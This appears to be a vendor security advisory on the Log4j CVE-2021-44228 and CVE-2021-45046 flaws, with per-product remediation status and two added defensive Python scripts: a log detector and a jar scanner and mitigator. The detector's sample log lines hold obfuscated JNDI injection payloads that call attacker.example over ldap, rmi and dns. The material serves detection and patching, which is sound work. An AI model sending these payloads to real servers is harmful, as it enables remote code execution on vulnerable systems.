Apache Log4j 2 Vulnerability (CVE-2021-44228) Information / [CVE-2021-45046 (Dec 14, 2021)]

Zebra Technologies is actively following the security vulnerability in the open-source Apache "Log4j 2" utility (CVE-2021-44228). We are currently assessing the potential impact of the vulnerability for Zebra products and solutions. This is an ongoing event, and we will continue to provide updates through our customer communications channels. Our support page will be updated to include relevant information as it becomes available.

Background: Apache Log4j 2 is a widely used Java logging library, embedded in many server applications to record requests and other events. On December 9, 2021, a vulnerability was publicly reported in Log4j 2 versions 2.0-beta9 through 2.14.1 that allows an unauthenticated attacker to execute arbitrary code on any system that logs attacker-controlled data with an affected version.

On December 10, 2021, the NIST National Vulnerability Database published CVE-2021-44228 with a critical (CVSS 10.0) severity rating. More specifically, the Java Naming and Directory Interface (JNDI) features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from remote servers when message lookup substitution is enabled. In practice, any attacker-supplied string that reaches a log statement, for example an HTTP header value containing a lookup of the form ${jndi:ldap://<attacker host>/...}, causes the vulnerable logger to resolve that reference and load the remote object it returns.

CVE-2021-45046 (Dec 14, 2021)

Description: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This allows attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DoS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. Apache later revised this advisory to CVSS 9.0 after the localhost restriction in 2.15.0 was shown to be bypassable in some environments, which allows information leakage and remote code execution rather than only DoS; the guidance to move to 2.16.0 is unchanged.
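The two descriptions above share one attacker primitive: a string containing a JNDI lookup that reaches a logger, either directly in the message (CVE-2021-44228) or via Thread Context Map data rendered by the layout (CVE-2021-45046). As an added example written for this page (not Zebra's or Apache's code), the detector below first undoes the nesting tricks Log4j's lookup syntax makes possible (${lower:...}, ${upper:...}, and the default-value form ${key:-x}, which is how ${::-j}ndi and ${env:NOPE:-j}ndi spell "jndi") and only then searches for the lookup, so obfuscated payloads are not missed. The access-log lines are constructed samples; resolving ${env:NAME:-x} to its default assumes NAME is unset, which is the detection-friendly choice.

```python
import re

# Innermost ${...} lookup: a body with no further "${" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After de-obfuscation: a JNDI lookup and its URI scheme (ldap, ldaps, rmi, dns, iiop, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def _resolve(body):
    """Resolve one lookup body the way a pre-2.16 Log4j would, for the tricks seen in payloads."""
    key = body.partition(":")[0].strip().lower()
    if key == "jndi":
        return None                       # the payload itself: leave it for the detector
    if ":-" in body:                      # default-value syntax ${key:-default}; assumes key is unset
        return body.split(":-", 1)[1]
    if key == "lower":
        return body.partition(":")[2].lower()
    if key == "upper":
        return body.partition(":")[2].upper()
    return None                           # other lookups (date, sys, env without default): untouched


def normalize(s, max_rounds=32):
    """Repeatedly resolve innermost lookups until the string stops changing (bounded on purpose)."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = _INNER.sub(repl, s)
        if not changed:
            break
    return s


def scan_lines(lines):
    """One finding per line whose de-obfuscated form contains a JNDI lookup."""
    findings = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            findings.append({"line": i, "scheme": m.group(1).lower(), "normalized": norm})
    return findings


# Constructed sample access-log lines (not real traffic); payloads ride in the User-Agent field.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:${lower:r}mi://attacker.example/x}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/b}"',
    '10.0.0.10 - - [10/Dec/2021:12:00:05 +0000] "GET /x HTTP/1.1" 404 "-" "${${env:NOPE:-j}ndi:dns://attacker.example/c}"',
    '10.0.0.11 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 "-" "report-jndi-config ${date:yyyy-MM-dd}"',
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"line {f['line']}: jndi scheme={f['scheme']}  ->  {f['normalized']}")
```

Lines 1 to 4 are reported with schemes ldap, rmi, ldap and dns; the benign lines (a normal User-Agent, and one that merely contains the word "jndi" next to an unrelated ${date:...} lookup) are not. A grep for the literal "${jndi:" would have caught only line 1. The same normalization applies to MDC values, cookies, or any other field an application might log, which is the point of CVE-2021-45046.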

What should I do to protect myself?

We strongly encourage customers to consult with their software vendors and obtain patches and updates as soon as possible for all impacted software applications.

For internally developed servers or applications, we strongly encourage customers who manage environments containing Log4j 2 to update to Log4j 2.16.0 or later (2.12.2 for Java 7) per Apache's guidance at https://logging.apache.org/log4j/2.x/ ; 2.15.0 addresses CVE-2021-44228 but not CVE-2021-45046. Where an upgrade is not immediately possible, Apache's documented mitigation is to remove the JndiLookup class from the log4j-core jar. Setting -Dlog4j2.formatMsgNoLookups=true (or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable) blocks message lookups only and is not a sufficient mitigation for CVE-2021-45046.
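To turn the upgrade-or-mitigate guidance above into something that can be run against a fleet, the script below (an added example written for this page, not Zebra's or Apache's code) inspects a log4j-core jar, classifies it against CVE-2021-44228 and CVE-2021-45046 by version and by whether JndiLookup.class is still present, and applies Apache's class-removal mitigation by rewriting the jar without that entry. It assumes the version can be read from Implementation-Version in the manifest or from Maven's pom.properties, which is how log4j-core is packaged; the jars it builds for the demonstration are constructed stand-ins (a manifest plus placeholder class entries), not real Log4j artifacts.

```python
import io
import os
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def _version_tuple(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). The pre-release suffix is dropped,
    which is safe because every 2.x release below 2.15.0 is treated as affected anyway."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")
    return tuple(int(x or 0) for x in m.groups()) if m else None


def log4j_core_version(zf):
    """Version from the jar manifest, falling back to Maven's pom.properties (assumed layout)."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
        if m:
            return m.group(1)
    except KeyError:
        pass
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(\S+)", props, re.M)
        return m.group(1) if m else None
    except KeyError:
        return None


def assess(jar_bytes):
    """Classify one jar against the two CVEs using version plus presence of JndiLookup.class."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        version = log4j_core_version(zf)
        has_jndi = JNDI_CLASS in zf.namelist()
    v = _version_tuple(version)
    if v is None:
        status = "unknown (no log4j-core version found)"
    elif v >= (2, 16, 0) or (2, 12, 2) <= v < (2, 13, 0) or (2, 3, 1) <= v < (2, 4, 0):
        status = "fixed"                          # 2.16.0+, 2.12.2+ (Java 7), 2.3.1+ (Java 6)
    elif not has_jndi:
        status = "mitigated (JndiLookup.class removed)"
    elif v == (2, 15, 0):
        status = "vulnerable (CVE-2021-45046)"    # 44228 fixed, non-default layouts still exposed
    else:
        status = "vulnerable (CVE-2021-44228)"
    return {"version": version, "jndi_lookup_present": has_jndi, "status": status}


def remove_jndi_lookup(jar_bytes):
    """Apache's documented mitigation for jars that cannot be upgraded: drop JndiLookup.class."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def scan_tree(root):
    """Assess every *.jar under a directory (the entry point you would run on a real host)."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    results[path] = assess(fh.read())
    return results


def build_sample_jar(version, include_jndi=True):
    """Constructed stand-in for a log4j-core jar: manifest plus placeholder class entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    for ver in ("2.14.1", "2.15.0", "2.16.0", "2.12.2"):
        print(ver, assess(build_sample_jar(ver)))
    print("2.14.1 after class removal", assess(remove_jndi_lookup(build_sample_jar("2.14.1"))))
```

On a real host, run scan_tree against the application's library directories and restart the JVM after replacing any jar; the rewrite is the same thing Apache's one-liner zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class does. Two caveats: the walker does not descend into jars nested inside .war or .ear files, which is where log4j-core most often hides in deployed applications, and a "fixed" result here covers only the two CVEs discussed on this page.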

SUPPORT PAGES FOR IMPACTED PRODUCTS:

Affected Product / CVE-2021-44228 (Apache Log4j 2) status and date / CVE-2021-45046 status and date

Visibility IQ (VIQF)
  CVE-2021-44228: Limited exposure to this vulnerability; remediation complete. Remediated Dec 12th, 2021.
  CVE-2021-45046: Not affected. N/A.

SOTI MobiControl v14.3 to 15.4.1 (Hosted Environments)
  CVE-2021-44228: Limited exposure to this vulnerability. Remediated Dec 22nd, 2021.
  CVE-2021-45046: Limited exposure to this vulnerability. Remediated Dec 22nd, 2021.

PTT Pro Windows/Desktop (G1, G2)
  CVE-2021-44228: Upon continued assessment, this Workforce Connect (WFC) product has been determined to not be impacted by this vulnerability. N/A.
  CVE-2021-45046: Upon continued assessment, this Workforce Connect (WFC) product has been determined to not be impacted by this vulnerability. N/A.

Zebra Enterprise Messaging
  CVE-2021-44228: After investigation, the version in use is not impacted by this vulnerability. Remediated Dec 15, 2021.
  CVE-2021-45046: Not affected. N/A.

Fetch
  CVE-2021-44228: Limited exposure to this vulnerability; engineering mitigated the issue. Remediated Dec 12th, 2021.
  CVE-2021-45046: Initially assessed as limited exposure with engineering working to resolve; upon continued assessment, this product has been determined to not be impacted.

Reflexis
  CVE-2021-44228: Full exposure to this vulnerability. Remediated Dec 29th, 2021.
  CVE-2021-45046: Full exposure to this vulnerability. Remediated Jan 7th, 2022.

Visibility Server Software (ZLS)
  CVE-2021-44228: After investigation, the version in use is not impacted by this vulnerability. Remediated Dec 14, 2021.
  CVE-2021-45046: After investigation, the version in use is not impacted by this vulnerability. N/A.

MotionWorks Enterprise (ZLS)
  CVE-2021-44228: Remediated by setting -Dlog4j2.formatMsgNoLookups=true when starting the JVM. Remediated Dec 14, 2021.
  CVE-2021-45046: Low risk: the components that use Log4j only receive requests after the user is authenticated, and they do not log arbitrary user input. Remediated Dec 19, 2021.

Zebra Profitect (ZPA)
  CVE-2021-44228: Limited exposure to this vulnerability; engineering removed IntelliJ and Log4j to remediate. Remediated Dec 10th, 2021.
  CVE-2021-45046: Not affected. N/A.

Disclaimer: Zebra makes every attempt to release security updates on or about the time that Google releases its respective security bulletin. However, delivery time of security updates may vary depending on the region, product model, and third party software suppliers. Under some circumstances, the OS must be updated to the latest maintenance release prior to installing the security updates. Individual product updates will provide specific guidance.

Unless otherwise noted, there have been no reports of active customer exploitation or abuse from these newly reported issues.
